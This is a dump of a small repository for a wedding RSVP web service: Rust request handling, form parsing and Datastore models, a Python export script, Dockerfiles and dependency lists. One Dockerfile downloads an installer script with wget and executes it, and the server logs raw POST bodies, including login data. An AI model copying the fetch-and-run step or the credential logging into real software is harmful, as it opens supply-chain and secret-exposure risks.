Box::new(future::ok(response))\n }\n}\n\nimpl Service for RsvpService {\n type Request = server::Request<Body>;\n type Response = server::Response<Body>;\n type Error = HyperError;\n type Future = Box<Future<Item = Self::Response, Error = Self::Error>>;\n\n fn call(&self, request: Self::Request) -> Self::Future {\n let uri = request.uri().clone();\n println!(\"{} {}\", request.method(), uri);\n\n match request.method() {\n Method::Get => RsvpService::handle_static(uri),\n\n Method::Post => {\n // TODO(jacob): Could we put a lifetime on RsvpService instead of cloning these?\n let account_data_clone_1 = self.account_data.clone();\n let account_data_clone_2 = self.account_data.clone();\n let datastore_client_clone_1 = self.datastore_client.clone();\n let datastore_client_clone_2 = self.datastore_client.clone();\n let rsvp_credentials = self.rsvp_credentials.clone();\n\n let response_future = request.body().concat2().and_then(move |data| {\n let data_str = str::from_utf8(&data).unwrap_or(\n format!(\"unparseable - {:?}\", data).as_str()\n ).to_string();\n println!(\"received POST data: {}\", data_str);\n\n RsvpService::handle_login(\n account_data_clone_1,\n datastore_client_clone_1,\n rsvp_credentials,\n &data,\n ).or_else(move || {\n RsvpService::handle_submission(\n account_data_clone_2,\n datastore_client_clone_2,\n &data,\n )\n }).unwrap_or_else(|| {\n println!(\"invalid POST data: {}\", data_str);\n let response = server::Response::new()\n .with_status(StatusCode::BadRequest)\n .with_body(Body::from(\"Bad Request\"));\n Box::new(future::ok(response))\n })\n });\n Box::new(response_future)\n },\n\n _ => {\n let response = server::Response::new()\n .with_status(StatusCode::MethodNotAllowed)\n .with_body(Body::from(\"Method Not Allowed\"));\n Box::new(future::ok(response))\n },\n }\n }\n}\n\n" }, { "alpha_fraction": 0.5047619342803955, "alphanum_fraction": 0.5071428418159485, "avg_line_length": 31.30769157409668, "blob_id": "c071870008a90b0a8321ab016f00a77e91f7f16e", "content_id": "3c5bd928f36b9754e2cb7ce5cb11f0396e680b7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2100, "license_type": "no_license", "max_line_length": 93, "num_lines": 65, "path": "/src/datastore/client.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "use serde_json::Value;\n\nuse model::Rsvp;\n\n#[derive(Debug)]\npub enum RsvpQueryResult {\n NotFound,\n Single(Rsvp),\n Multiple(Vec<Rsvp>),\n}\n\nimpl RsvpQueryResult {\n // TODO(jacob): Figure out how to define Deserialize/Serialize for the datastore json\n // format.\n pub fn from_json(json: &Value) -> RsvpQueryResult {\n json[\"batch\"].get(\"entityResults\").map_or_else(\n || RsvpQueryResult::NotFound,\n |entity_results| {\n let entities = entity_results.as_array().expect(\"invalid query result json\");\n let rsvp_entries = entities\n .into_iter()\n .flat_map(|entity| Rsvp::from_json(entity))\n .collect::<Vec<Rsvp>>();\n match rsvp_entries.as_slice() {\n // NOTE(jacob): This should never happen, unless we get back malformed\n // json from google datastore. 
In this case we just log what we\n // found and look the other way.\n [] => {\n println!(\"failed to parse query result json: {}\", json);\n RsvpQueryResult::NotFound\n },\n [single] => RsvpQueryResult::Single(single.clone()),\n multiple => RsvpQueryResult::Multiple(multiple.to_vec()),\n }\n },\n )\n }\n}\n\n#[derive(Debug)]\npub struct CommitResult {\n index_updates: Option<u64>,\n version: String,\n}\n\nimpl CommitResult {\n pub fn from_json(json: &Value) -> Option<CommitResult> {\n let version = json\n .get(\"mutationResults\")?\n .as_array()?\n .get(0)?\n .get(\"version\")?\n .as_str()?\n .to_string();\n let index_updates = json.get(\"index_updates\").map_or(\n Some(None),\n |value| value.as_u64().map(|num| Some(num)),\n )?;\n let commit_result = CommitResult {\n index_updates: index_updates,\n version: version,\n };\n Some(commit_result)\n }\n}\n" }, { "alpha_fraction": 0.4954407215118408, "alphanum_fraction": 0.6990881562232971, "avg_line_length": 17.27777862548828, "blob_id": "d6727c13dbd865eafb2b6826a3645a26bfc240c9", "content_id": "a625b9026009e96db85cabb9f083fc44552303ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 329, "license_type": "no_license", "max_line_length": 31, "num_lines": 18, "path": "/requirements.txt", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "cachetools==2.1.0\ncertifi==2018.4.16\nchardet==3.0.4\ngoogle-api-core==1.2.1\ngoogle-auth==1.5.0\ngoogle-cloud-core==0.28.1\ngoogle-cloud-datastore==1.6.0\ngoogleapis-common-protos==1.5.3\ngrpcio==1.12.1\nidna==2.7\nprotobuf==3.6.0\npyasn1==0.4.3\npyasn1-modules==0.2.1\npytz==2018.4\nrequests==2.20.1\nrsa==3.4.2\nsix==1.11.0\nurllib3== 1.24.2\n" }, { "alpha_fraction": 0.39826440811157227, "alphanum_fraction": 0.4002954065799713, "avg_line_length": 44.512603759765625, "blob_id": "ce619570984addf996401add6015b965bf649d33", "content_id": "ba73205661eff53f7f6081d9f44f9261292a791f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 5416, "license_type": "no_license", "max_line_length": 99, "num_lines": 119, "path": "/src/service/form.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "use regex::Regex;\nuse std::collections::HashMap;\nuse std::str;\nuse url::form_urlencoded;\n\nenum ParsingFormValue {\n String(String),\n Array(Vec<Option<String>>),\n}\n\n#[derive(Debug)]\npub enum FormValue {\n String(String),\n Array(Vec<String>),\n}\n\nimpl FormValue {\n pub fn as_array(&self) -> Option<Vec<String>> {\n match self {\n FormValue::String(_) => None,\n FormValue::Array(array) => Some(array.to_vec()),\n }\n }\n\n pub fn as_string(&self) -> Option<String> {\n match self {\n FormValue::String(string) => Some(string.to_string()),\n FormValue::Array(_) => None,\n }\n }\n\n /* form_urlencoded::parse does not handle array data correctly, so we define our own\n * helper here.\n *\n * NOTE(jacob): This function takes some liberties with data validation -- in\n * particular, undefined behavior includes:\n * - mixed array and non-array values for a single variable\n * - multiple occurances of the same variable\n * - skipping array indices\n */\n pub fn parse_form_data(form_data: &[u8]) -> HashMap<String, FormValue> {\n // Parse everything into vectors for simplicity, and then do a final pass to convert\n // to the appropriate enum.\n let initial_vector_map: HashMap<String, ParsingFormValue> = HashMap::new();\n // TODO(jacob): figure out how to cache this\n let array_regex = 
Regex::new(r\"(?P<name>.+)\\[(?P<index>\\d+)\\]\").unwrap();\n\n let vector_map = form_urlencoded::parse(form_data)\n .map(|(name, value)| (name.to_string(), value.to_string()))\n .fold(\n initial_vector_map,\n |mut vector_map, (name, value)| {\n let value1 = value.clone();\n let value2 = value.clone();\n let (var_name, new_value) = array_regex.captures(&name)\n .and_then(|captures| {\n captures.name(\"name\")\n .map(|mat| mat.as_str())\n .and_then(|var_name| {\n captures.name(\"index\").map(|mat| (var_name, mat.as_str()))\n }).and_then(|(var_name, index_str)| {\n str::parse::<usize>(index_str).ok()\n .map(|index| (var_name.to_string(), index))\n })\n }).map_or_else(\n || (name, ParsingFormValue::String(value)),\n |(var_name, index)| {\n let new_parsing_value = vector_map.get(&var_name).map_or_else(\n || {\n let mut new_values = Vec::with_capacity(index + 1);\n new_values.resize(index + 1, None);\n new_values[index] = Some(value1);\n ParsingFormValue::Array(new_values)\n },\n |existing_value| {\n match existing_value {\n ParsingFormValue::String(_) => {\n let mut new_values = Vec::with_capacity(index + 1);\n new_values.resize(index + 1, None);\n new_values[index] = Some(value2);\n ParsingFormValue::Array(new_values)\n },\n ParsingFormValue::Array(values) => {\n let mut new_values = values.clone();\n if new_values.len() <= index {\n new_values.resize(index + 1, None);\n };\n new_values[index] = Some(value2);\n ParsingFormValue::Array(new_values)\n },\n }\n },\n );\n (var_name, new_parsing_value)\n },\n );\n\n vector_map.insert(var_name, new_value);\n vector_map\n }\n );\n\n vector_map.into_iter().flat_map(|(name, value)| {\n match value {\n ParsingFormValue::String(string) => Some((name, FormValue::String(string))),\n ParsingFormValue::Array(values) => {\n let flattened_values = values\n .into_iter()\n .flat_map(|value_opt| value_opt)\n .collect::<Vec<String>>();\n match &flattened_values[..] {\n [] => None, // should never happen with well-formed input\n valid => Some((name, FormValue::Array(valid.to_vec()))),\n }\n }\n }\n }).collect()\n }\n}\n" }, { "alpha_fraction": 0.6271604895591736, "alphanum_fraction": 0.6370370388031006, "avg_line_length": 26, "blob_id": "14d417b71ab1517edbb846746893cd2a6d323e5b", "content_id": "9ad7cdc4c6e3b97308d1091b6e42b8e0d7d0880d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 405, "license_type": "no_license", "max_line_length": 83, "num_lines": 15, "path": "/base.dockerfile", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "FROM nginx:1.15.0\n\nRUN apt-get update && \\\n apt-get -y install curl file gcc gpg libssl-dev pkg-config supervisor wget && \\\n rm -rf /var/lib/apt/lists/* && \\\n wget https://static.rust-lang.org/rustup.sh && \\\n chmod +x rustup.sh && \\\n ./rustup.sh --disable-sudo\n\nCOPY Cargo.* /usr/src/wwww/\nCOPY src /usr/src/wwww/src\n\nWORKDIR /usr/src/wwww\nRUN cargo install --root . 
&& \\\n rm -rf target\n" }, { "alpha_fraction": 0.5200328826904297, "alphanum_fraction": 0.5208553671836853, "avg_line_length": 31.238636016845703, "blob_id": "a7e7066519f798815305a078d923ee59d3db20d2", "content_id": "49dc3bee8344b0f23e70ff7a4b66cfde16793a21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 8511, "license_type": "no_license", "max_line_length": 96, "num_lines": 264, "path": "/src/model/mod.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "use jsonwebtoken::{self, Algorithm, Validation};\nuse serde_json::Value;\n\nuse AccountData;\nuse service::form::FormValue;\n\n// TODO(jacob): Use Value::pointer instead of indexing for all of these.\nfn parse_array_value<T>(\n json: &Value,\n value_reader: &Fn(&Value) -> Option<T>\n) -> Option<Vec<T>> {\n json[\"arrayValue\"][\"values\"].as_array().map(|values| {\n values.into_iter().flat_map(value_reader).collect()\n })\n}\n\nfn parse_boolean_value(json: &Value) -> Option<bool> {\n json[\"booleanValue\"].as_bool()\n}\n\nfn parse_integer_value(json: &Value) -> Option<u8> {\n // GCP datastore handles integers encoded as strings.\n json[\"integerValue\"].as_str().and_then(|s| s.parse().ok())\n}\n\nfn parse_string_value(json: &Value) -> Option<String> {\n json[\"stringValue\"].as_str().map(|s| s.to_string())\n}\n\nfn render_array_value<T>(values: &Vec<T>, render_value: &Fn(&T) -> Value) -> Value {\n json!({\n \"arrayValue\": {\n \"values\": Value::Array(values.into_iter().map(render_value).collect()),\n },\n })\n}\n\nfn render_boolean_value(value: &bool, exclude_from_indexes: bool) -> Value {\n json!({\n \"booleanValue\": value,\n \"excludeFromIndexes\": exclude_from_indexes,\n })\n}\n\n// GCP datastore handles integers encoded as strings.\nfn render_integer_value(value: &String, exclude_from_indexes: bool) -> Value {\n json!({\n \"integerValue\": value,\n \"excludeFromIndexes\": exclude_from_indexes,\n })\n}\n\nfn render_string_value(value: &String, exclude_from_indexes: bool) -> Value {\n json!({\n \"stringValue\": value,\n \"excludeFromIndexes\": exclude_from_indexes,\n })\n}\n\n#[derive(Clone, Debug)]\npub struct Name {\n pub first_name: String,\n pub last_name: String,\n}\n\nimpl Name {\n // TODO(jacob): Figure out how to define Deserialize/Serialize for the datastore json\n // format.\n fn from_json(json: &Value) -> Option<Name> {\n let properties = &json[\"entityValue\"][\"properties\"];\n let first_name = parse_string_value(&properties[\"first_name\"])?;\n let last_name = parse_string_value(&properties[\"last_name\"])?;\n let name = Name {\n first_name: first_name,\n last_name: last_name,\n };\n Some(name)\n }\n\n fn to_json(&self, exclude_from_indexes: bool) -> Value {\n json!({\n \"entityValue\": {\n \"properties\": {\n \"first_name\": render_string_value(&self.first_name, exclude_from_indexes),\n \"last_name\": render_string_value(&self.last_name, exclude_from_indexes),\n },\n },\n })\n }\n}\n\n#[derive(Clone, Debug)]\npub struct Guest {\n pub name: Name,\n pub dietary_notes: String,\n}\n\nimpl Guest {\n // TODO(jacob): Figure out how to define Deserialize/Serialize for the datastore json\n // format.\n fn from_json(json: &Value) -> Option<Guest> {\n let properties = &json[\"entityValue\"][\"properties\"];\n let name = Name::from_json(&properties[\"name\"])?;\n let dietary_notes = parse_string_value(&properties[\"dietary_notes\"])?;\n let guest = Guest {\n name: name,\n dietary_notes: dietary_notes,\n };\n Some(guest)\n }\n\n fn to_json(&self) -> Value {\n 
json!({\n \"entityValue\": {\n \"properties\": {\n \"name\": self.name.to_json(true),\n \"dietary_notes\": render_string_value(&self.dietary_notes, true),\n },\n },\n })\n }\n}\n\n// TODO(jacob): Is there some way to de-dupe common fields here?\n#[derive(Clone, Debug)]\npub enum Rsvp {\n /* A database entry for someone who has not yet RSVPed */\n Empty {\n key: Value,\n invited: Vec<Name>,\n invited_count: u8,\n },\n /* A database entry for someone who has RSVPed */\n Full {\n key: Value,\n attending: Vec<Guest>,\n email: String,\n going: bool,\n invited: Vec<Name>,\n other_notes: String,\n invited_count: u8,\n },\n}\n\nimpl Rsvp {\n pub fn from_form_data(\n account_data: &AccountData,\n form_data: &[u8]\n ) -> Option<Rsvp> {\n let params = FormValue::parse_form_data(form_data);\n\n let token = params.get(\"token\")?.as_string()?;\n let token_data = jsonwebtoken::decode::<Value>(\n &token,\n &account_data.public_key,\n &Validation::new(Algorithm::RS256),\n ).ok()?.claims;\n\n let key = token_data.get(\"key\")?.clone();\n let invited = parse_array_value(&token_data[\"invited\"], &Name::from_json)?;\n let invited_count = parse_integer_value(&token_data[\"invited_count\"])?;\n\n let first_names = params.get(\"first_name\")?.as_array()?;\n let last_names = params.get(\"last_name\")?.as_array()?;\n let dietary_noteses = params.get(\"dietary_notes\")?.as_array()?;\n let attending = first_names.into_iter().zip(last_names).zip(dietary_noteses)\n .map(|((first_name, last_name), dietary_notes)| {\n Guest {\n name: Name {\n first_name: first_name,\n last_name: last_name,\n },\n dietary_notes: dietary_notes,\n }\n }).collect();\n\n let email = params.get(\"email\")?.as_string()?;\n let going = params.get(\"going\")\n .map_or(Some(false), |going_param| Some(going_param.as_string()? 
== \"yes\"))?;\n let other_notes = params.get(\"other_notes\")?.as_string()?;\n\n let full_rsvp = Rsvp::Full {\n key: key,\n attending: attending,\n email: email,\n invited: invited,\n going: going,\n other_notes: other_notes,\n invited_count: invited_count,\n };\n Some(full_rsvp)\n }\n\n // TODO(jacob): Figure out how to define Deserialize/Serialize for the datastore json\n // format.\n pub fn from_json(json: &Value) -> Option<Rsvp> {\n let key = json[\"entity\"][\"key\"].clone();\n let properties = &json[\"entity\"][\"properties\"];\n let invited = parse_array_value(&properties[\"invited\"], &Name::from_json)?;\n let invited_count = parse_integer_value(&properties[\"invited_count\"])?;\n\n match parse_boolean_value(&properties[\"going\"]) {\n None => {\n let empty_rsvp = Rsvp::Empty {\n key: key,\n invited: invited,\n invited_count: invited_count,\n };\n Some(empty_rsvp)\n },\n\n Some(going) => {\n let attending = parse_array_value(&properties[\"attending\"], &Guest::from_json)?;\n let email = parse_string_value(&properties[\"email\"])?;\n let other_notes = parse_string_value(&properties[\"other_notes\"])?;\n\n let full_rsvp = Rsvp::Full {\n key: key,\n attending: attending,\n email: email,\n going: going,\n invited: invited,\n other_notes: other_notes,\n invited_count: invited_count,\n };\n Some(full_rsvp)\n },\n }\n }\n\n pub fn to_json(&self) -> Value {\n match self {\n Rsvp::Empty {\n key,\n invited,\n invited_count,\n } => json!({\n \"key\": key,\n \"invited\": render_array_value(&invited, &|name| name.to_json(false)),\n \"invited_count\": render_integer_value(&invited_count.to_string(), true),\n }),\n\n Rsvp::Full {\n key,\n attending,\n email,\n going,\n invited,\n other_notes,\n invited_count,\n } => json!({\n \"key\": key,\n \"properties\": {\n \"attending\": render_array_value(&attending, &|guest| guest.to_json()),\n \"email\": render_string_value(&email, true),\n \"invited\": render_array_value(&invited, &|name| name.to_json(false)),\n \"going\": render_boolean_value(&going, false),\n \"other_notes\": render_string_value(&other_notes, true),\n \"invited_count\": render_integer_value(&invited_count.to_string(), true),\n },\n }),\n }\n }\n}\n" }, { "alpha_fraction": 0.5928041338920593, "alphanum_fraction": 0.595088541507721, "avg_line_length": 30.836362838745117, "blob_id": "a6971d41702409591fcad35aa105ef9816e13c4c", "content_id": "7801ccd14edacac88317b6da0cf10a1faed8bbbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1751, "license_type": "no_license", "max_line_length": 79, "num_lines": 55, "path": "/scripts/export.py", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "from argparse import ArgumentParser, FileType\nfrom google.cloud import datastore\n\n\ndef parse_args():\n parser = ArgumentParser('Export RSVP data to a .tsv file')\n parser.add_argument('destination', type=FileType('w', encoding='UTF-8'))\n return parser.parse_args()\n\ndef sanitize_string(string):\n return string.replace('\\n', '\\\\n').replace('\\r', '\\\\r').replace('\\t', '\\\\t')\n\ndef main():\n args = parse_args()\n datastore_client = datastore.Client()\n max_attendees = 0\n lines = []\n\n query = datastore_client.query(kind='rsvp')\n for rsvp in query.fetch():\n if 'going' in rsvp:\n going = rsvp['going']\n invited = ', '.join((\n '{} {}'.format(\n sanitize_string(invited['first_name']),\n sanitize_string(invited['last_name']),\n ) for invited in rsvp['invited']\n ))\n line = '{}\\t{}'.format(going, invited)\n\n if going:\n count 
= len(rsvp['attending'])\n email = sanitize_string(rsvp['email'])\n other_notes = sanitize_string(rsvp['other_notes'])\n line += '\\t{}\\t{}\\t{}'.format(count, email, other_notes)\n\n for attendee in rsvp['attending']:\n line += '\\t{}\\t{}\\t{}'.format(\n sanitize_string(attendee['name']['first_name']),\n sanitize_string(attendee['name']['last_name']),\n sanitize_string(attendee['dietary_notes']),\n )\n max_attendees = max(max_attendees, count)\n\n lines.append(line + '\\n')\n\n header = 'going\\tinvited\\tcount\\temail(s)\\tother_notes'\n for i in range(1, max_attendees + 1):\n header += '\\tfirst_name {}\\tlast_name {}\\tdietary_notes {}'.format(i, i, i)\n args.destination.write(header + '\\n')\n for line in lines:\n args.destination.write(line)\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7710145115852356, "alphanum_fraction": 0.7710145115852356, "avg_line_length": 27.75, "blob_id": "7d5b6d1be2e518fcadb318ab02d2c643d1f4e030", "content_id": "ec9a0858b24a3a7f99fa71b1ee36409438f41d28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 345, "license_type": "no_license", "max_line_length": 80, "num_lines": 12, "path": "/app.dockerfile", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "FROM wwww-base:test\n\nCOPY nginx.conf /etc/nginx/nginx.conf\nCOPY supervisord.conf /etc/supervisor/supervisord.conf\n\nCOPY keys /usr/src/wwww/keys\nCOPY www /usr/src/wwww/www\nCOPY templates /usr/src/wwww/templates\n\nRUN rm -r /usr/share/nginx/html && ln -s /usr/src/wwww/www /usr/share/nginx/html\n\nCMD supervisord -c /etc/supervisor/supervisord.conf\n" }, { "alpha_fraction": 0.43573668599128723, "alphanum_fraction": 0.5799372792243958, "avg_line_length": 16.72222137451172, "blob_id": "7b63d33fe7872ce6c8ca9ff575483f1e57cf6bf2", "content_id": "e453ab62bd0d038bbf0252c08f8d6f07e8c31fa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 319, "license_type": "no_license", "max_line_length": 29, "num_lines": 18, "path": "/Cargo.toml", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "[package]\nname = \"wwww\"\nversion = \"0.2.0\"\nauthors = [\"jacob <[email protected]>\"]\n\n[dependencies]\nbytes = \"0.4.8\"\nfutures = \"0.1.21\"\nhyper = \"0.11.27\"\nhyper-tls = \"0.1.3\"\nitertools = \"0.7.8\"\njsonwebtoken = \"4.0.1\"\nregex = \"1.0.0\"\nserde = \"1.0.66\"\nserde_derive = \"1.0.66\"\nserde_json = \"1.0.19\"\ntokio-core = \"0.1.11\"\nurl = \"1.7.0\"\n" } ]
11
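The `parse_form_data` helper in `src/service/form.rs` of the jvandew/wwww listing above groups `name[index]`-style form fields into arrays before flattening out holes. For reference, here is a minimal Python sketch of the same bracket-index grouping, handy for prototyping test inputs against the Rust implementation. The regex mirrors the one in form.rs, but the function name and the exact behavior on malformed input are illustrative assumptions, not part of the repository:

```python
import re
from urllib.parse import parse_qsl

# Matches array-style form names such as "first_name[0]" (mirrors the Rust regex).
ARRAY_RE = re.compile(r"(?P<name>.+)\[(?P<index>\d+)\]")

def parse_form_data(form_data: bytes) -> dict:
    """Group repeated name[index] fields into lists; plain fields stay strings."""
    result = {}
    for name, value in parse_qsl(form_data.decode()):
        match = ARRAY_RE.fullmatch(name)
        if match is None:
            result[name] = value  # scalar field
            continue
        var_name, index = match.group("name"), int(match.group("index"))
        # Mixed scalar/array input is undefined here too, as in the Rust version.
        values = result.setdefault(var_name, [])
        if len(values) <= index:
            values.extend([None] * (index + 1 - len(values)))  # grow to fit the index
        values[index] = value
    # Drop holes left by skipped indices, like the Rust flat_map pass.
    return {
        key: [v for v in val if v is not None] if isinstance(val, list) else val
        for key, val in result.items()
    }

# Two guests submitted in one form post:
print(parse_form_data(b"email=a%40b.c&first_name[0]=Ada&first_name[1]=Alan"))
# -> {'email': 'a@b.c', 'first_name': ['Ada', 'Alan']}
```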
IppikiOukami/TCP_Framing
https://github.com/IppikiOukami/TCP_Framing
1ee0f365df8909b2c901efc99ee65e3e895b714e
3a4c598374b0a22cf46b0bc98de89dbfc84dbb02
16a79389885714e32cb495e592ebab55a7ea3940
refs/heads/master
2023-05-06T09:44:18.808136
2021-05-03T00:52:59
2021-05-03T00:52:59
369,058,436
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5747554898262024, "alphanum_fraction": 0.5850023031234741, "avg_line_length": 26.5256404876709, "blob_id": "bcfc84ab4e53f1d541f282e5e05e76a5006843da", "content_id": "d2d9602db7a9d401cf41ea06c26bdbbffb87e567", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2147, "license_type": "no_license", "max_line_length": 92, "num_lines": 78, "path": "/framing/client.py", "repo_name": "IppikiOukami/TCP_Framing", "src_encoding": "UTF-8", "text": "import socket, sys, re, time, os\nimport framedSocket\nimport workerThread\nfrom myIO import myReadLine\nsys.path.append(\"../lib\")\nimport params\n\nswitchesVarDefaults = (\n (('-s', '--server'), 'server', \"127.0.0.1:50001\"),\n (('-d', '--delay'), 'delay', \"0\"),\n (('-?', '--usage'), \"usage\", False), # boolean (set if present)\n )\n\nprogname = \"echoclient\"\nparamMap = params.parseParams(switchesVarDefaults)\nserver, usage = paramMap[\"server\"], paramMap[\"usage\"]\n\nif usage:\n params.usage()\n \ntry:\n serverHost, serverPort = re.split(\":\", server)\n serverPort = int(serverPort)\nexcept:\n print(\"Can't parse server:port from '%s'\" % server)\n sys.exit(1)\n \ns = None\nfor res in socket.getaddrinfo(serverHost, serverPort, socket.AF_UNSPEC, socket.SOCK_STREAM):\n af, socktype, proto, canonname, sa = res\n try:\n print(\"creating sock: af=%d, type=%d, proto=%d\" % (af, socktype, proto))\n s = socket.socket(af, socktype, proto)\n except socket.error as msg:\n print(\" error: %s\" % msg)\n s = None\n continue\n try:\n print(\" attempting to connect to %s\" % repr(sa))\n s.connect(sa)\n except socket.error as msg:\n print(\" error: %s\" % msg)\n s.close()\n s = None\n continue\n break\n \nif s is None:\n print('could not open socket')\n sys.exit(1)\n\ndelay = float(paramMap['delay'])\nif delay:\n print(f'sleeping for {delay}s')\n time.sleep(delay)\n print('done sleeping')\n \nframedSock = framedSocket.Framed_Socket(s)\n\nfileName = os.read(0,1024).decode().strip()\nprint(f'Sending {fileName}...')\nframedSock.tx(fileName.encode())\nif fileName == 'QUIT':\n print(\"Quitting...\")\n sys.exit(1)\nserverReply = framedSock.rx()\n\nprint(f\"Server response:{serverReply}\\n \")\n\n\nif serverReply == \"OK\":\n fd = open(('./files/'+fileName),'r') #open file to be sent\n content = fd.read()\n fd.close()\n framedSock.tx(content.encode())\nelse:\n os.write(2,(\"Error\").encode()) #if the file already exists then print error\n sys.exit(1)\n" }, { "alpha_fraction": 0.5207268595695496, "alphanum_fraction": 0.522430419921875, "avg_line_length": 31.61111068725586, "blob_id": "3733dda5f4a1a75b78446a1180730aafcdb0df16", "content_id": "6221417be3e954855c5cfbfb95456f6d357d006b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1761, "license_type": "no_license", "max_line_length": 79, "num_lines": 54, "path": "/framing/workerThread.py", "repo_name": "IppikiOukami/TCP_Framing", "src_encoding": "UTF-8", "text": "import socket, sys, re, os\nimport framedSocket\nsys.path.append(\"../lib\")\nimport params\nimport threading\nfrom threading import Thread\n\nthreadNum = 0\nlock = threading.Lock()\n\nclass Worker(Thread):\n def __init__(self,conn=None,addr=None):\n global threadNum\n Thread.__init__(self, name = \"Thread-%d\" % threadNum)\n threadNum += 1\n self.conn = conn\n self.addr = addr\n\n def checkTransfer(self, fileName,fileSet):\n global lock\n canUse = True\n lock.acquire() #lock the thread\n if fileName in fileSet: #file in 
use\n canUse = False\n lock.release() #unlock it\n return canUse\n\n def start(self,fileSet):\n framedSock = framedSocket.Framed_Socket(self.conn)\n fileName = framedSock.rx()\n if fileName == \"QUIT\":\n self.conn.shutdown(socket.SHUT_WR)\n sys.exit(1)\n filePath = './receivedFiles/' + fileName\n canUse = self.checkTransfer(filePath,fileSet)\n if not canUse:\n framedSock.tx(b'WAIT')\n elif os.path.isfile(filePath):\n framedSock.tx(b'File already in receivedFiles')\n else:\n framedSock.tx(b'OK')\n try:\n fd = open(filePath, \"w\")\n data = framedSock.rx()\n print('Writing: ', data)\n fd.write(data)\n fd.close()\n print(\"Complete\")\n except:\n print(f\"Error writing into file at {filePath}\")\n self.conn.shutdown(socket.SHUT_WR)\n return None\n self.conn.shutdown(socket.SHUT_WR)\n return filePath # return the path, so it matches what checkTransfer looks up in fileSet\n" }, { "alpha_fraction": 0.4256465435028076, "alphanum_fraction": 0.4396551847457886, "avg_line_length": 29.933332443237305, "blob_id": "b68c83d0301bf3dca775be2c9fa95889bcfce393", "content_id": "4bdb75c1f1a61d7da3926523563453c06504a29d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 73, "num_lines": 30, "path": "/framing/myIO.py", "repo_name": "IppikiOukami/TCP_Framing", "src_encoding": "UTF-8", "text": "from os import read\n\nlimit = b\"\" # current input buffer (bytes)\nindex = 0 # next position to consume in the buffer\n\ndef myGetChar(): #reads input char by char\n global limit\n global index\n if index == len(limit): # buffer exhausted\n index = 0\n limit = read(0,1000) # refill buffer from input\n if len(limit) == 0: # nothing to read\n return \"EOF\"\n character = chr(limit[index])\n index += 1\n return character\ndef myReadLine():\n global limit\n global index\n line = \"\"\n character = myGetChar()\n while character != '' and character != \"EOF\":\n line += character\n character = myGetChar()\n index = 0\n limit = b\"\"\n return line\n" }, { "alpha_fraction": 0.6007509231567383, "alphanum_fraction": 0.6082603335380554, "avg_line_length": 27.464284896850586, "blob_id": "56a6a0faa775c9f6d2da38541f54c8de55cb24d7", "content_id": "86cce4f6f1f07953496eb83819189297b42a87c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 799, "license_type": "no_license", "max_line_length": 92, "num_lines": 28, "path": "/framing/server.py", "repo_name": "IppikiOukami/TCP_Framing", "src_encoding": "UTF-8", "text": "import socket, sys, re\nimport workerThread\nsys.path.append(\"../lib\")\nimport params\n\nswitchesVarDefaults = (\n (('-l', '--listenPort') ,'listenPort', 50001),\n (('-?', '--usage'), \"usage\", False), \n )\n\nprogname = \"echoserver\"\nparamMap = params.parseParams(switchesVarDefaults)\n\nlistenPort = paramMap['listenPort']\nlistenAddr = '' \n\nif paramMap['usage']:\n params.usage()\nfileSet = set()\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((listenAddr, listenPort))\ns.listen(1)\n\nwhile True:\n print(\"Waiting on client...\")\n conn, addr = s.accept() # wait for incoming connection request\n print(f\"Connected to client: {addr}\\n\")\n result = workerThread.Worker(conn,addr).start(fileSet) # runs the transfer for this client\n if result: # only track completed transfers\n fileSet.add(result)\n \n" } ]
4
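The `framedSocket` module that `client.py` and `workerThread.py` import is not included in the IppikiOukami/TCP_Framing listing above, so the framing protocol itself is not shown. A minimal sketch of what a `Framed_Socket`-style wrapper typically looks like, length-prefixed messages over TCP, follows; the `tx`/`rx` method names match the calls in the repo, but the 4-byte big-endian length header and the class name are assumptions, not taken from the missing file:

```python
import socket
import struct

class FramedSocket:
    """Length-prefixed message framing over a TCP socket (sketch)."""

    HEADER = struct.Struct("!I")  # assumed: 4-byte big-endian length prefix

    def __init__(self, sock: socket.socket):
        self.sock = sock

    def tx(self, payload: bytes) -> None:
        # Prefix every message with its length so the peer knows where it ends.
        self.sock.sendall(self.HEADER.pack(len(payload)) + payload)

    def rx(self) -> str:
        length = self.HEADER.unpack(self._recv_exact(self.HEADER.size))[0]
        return self._recv_exact(length).decode()

    def _recv_exact(self, n: int) -> bytes:
        # recv() may return fewer bytes than requested; loop until we have n.
        data = b""
        while len(data) < n:
            chunk = self.sock.recv(n - len(data))
            if not chunk:
                raise ConnectionError("socket closed mid-frame")
            data += chunk
        return data
```

Framing like this is what lets the client send a file name and then a file body as two distinct messages over one stream, which is exactly the exchange `client.py` and `workerThread.py` perform.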
luozhouyang/datas
https://github.com/luozhouyang/datas
d69132ae0968008374d57920ed02184cb39ed23e
5fae91c5bd65cb88f0b2f7ace33a7c3875c3c75b
181371dcb2947f42e686ed79f8a540053e29c2cc
refs/heads/master
2023-06-24T16:26:57.360983
